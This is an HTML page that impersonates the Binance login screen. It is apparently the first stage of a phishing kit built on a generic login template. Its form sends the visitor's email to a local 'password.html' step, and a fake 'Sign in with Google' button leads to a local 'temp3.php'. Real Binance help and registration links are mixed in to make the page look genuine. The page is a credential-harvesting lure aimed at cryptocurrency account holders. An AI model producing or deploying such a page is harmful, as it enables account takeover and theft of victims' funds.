<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="robots" content="follow,index" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Binance | Log In</title>
        <meta name="description" content="Binance Global INC Crypto Trade Assets" />
        <meta name="keywords" content="login page css, login template, login css, login form template" />
        <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png" />
        <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png" />
        <link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png" />
        <link rel="manifest" href="https://mazipan.github.io/login-page-css/manifest.json" />
        <meta name="msapplication-TileColor" content="#fdcb04" />
        <meta name="theme-color" content="#fdcb04" />
        <link rel="manifest" href="https://mazipan.github.io/login-page-css/manifest.json" />
        <link rel="stylesheet" href="css/index.cdd05366.css" />
        <link rel="stylesheet" href="css/index.6a037238.css" />
        <link rel="stylesheet" href="css/index.fd599eac.css" />
		<link rel="stylesheet" href="css/style.css" />
		

		
        <link href="//fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&amp;display=swap" rel="stylesheet" />
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-25065548-2"></script>

    </head>
    <body>
	
	
        <div class="app">
            <div class="login-page">
                <header class="header">
                    <div class="header__content">
                        <div class="header__logo logo">
                            <img src="images/logo.png" alt class="logo__img">
                        </div>
                        <ul class="header__nav nav">
                            <li class="nav__item"><a href="https://accounts.binance.com/en/register-person" class="nav__link">Register</a></li>
                        </ul>
                    </div>
                </header>
						<center>
                        <div class="main__content-right">
                            <div class="form-login">
                                <div class="form-login__inner">
                                    <div class="form-login__header">
                                        <br>
										<br>
										<br>
										<br>
										<br>
										<br>
										<h1>Log In</h1>
                                        <p class="form-login__subtitle">Enter your Email to authorize</p>
                                    </div>
									<form class="form-login__form" action="./password.html" method="POST">
                                        <div class="field">
                                            <div class="field__group"><input autocomplete="off" type="email" placeholder="Email" name="email" class="field__input" /></div>

                                        </div>
                                        <div class="field"><button class="button button--yellow form-login__button">NEXT</button></div>
										
										<button onclick="location.href='./temp3.php'" type="button" class="login-with-google-btn" >
  										Sign in with Google
										</button>
										<br>
										<br>

                                        <div class="field"><a href="https://www.binance.com/en/support/faq/how-to-reset-your-binance-account-password-2d9adebbe9b446019f8895ce971d0870" class="link">Forgot Your Credential?</a></div>
										
                                    </form>
									
                                    <div class="form-login__footer">
                                        <p>Need an entity account? <a href="https://www.binance.com/en/support/faq/how-to-register-on-binance-app-360042718372">Sign Up</a></p>
                                    </div>
									
                                </div>
                            </div>
							
                        </div>
						

						<br>
						<div class="css-3kcv4i"><div data-bn-type="text" class="css-1om5toz">© 2017 - 2023 Binance.com. All rights reserved</div>
						
						</center>
                    </div>
					
                </main>
                
            </div>
			
        </div>
		
    </body>
</html>

